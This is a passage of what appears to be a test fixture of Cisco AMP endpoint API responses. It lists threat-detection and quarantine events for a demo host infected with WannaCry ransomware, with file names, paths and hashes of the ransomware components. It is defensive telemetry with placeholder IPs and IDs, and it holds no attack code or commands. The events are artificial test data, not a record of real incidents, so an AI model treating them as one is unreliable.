pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":541000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847670","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":776000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":745000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":730000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847667","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":620000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":355000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":308000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2372,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":293000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":277000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":230000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":184000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 